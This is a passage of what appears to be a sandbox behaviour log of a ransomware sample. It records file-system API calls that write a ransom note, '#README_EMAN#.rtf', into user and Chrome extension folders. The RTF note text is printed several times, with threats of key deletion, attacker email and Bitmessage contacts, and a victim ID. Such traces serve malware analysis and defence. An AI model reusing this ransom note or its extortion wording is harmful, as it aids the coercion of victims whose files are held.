that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0271.881] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.038] CloseHandle (hObject=0x294) returned 1 [0272.038] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0272.038] GetLastError () returned 0x2 [0272.038] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.038] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.038] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.038] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b 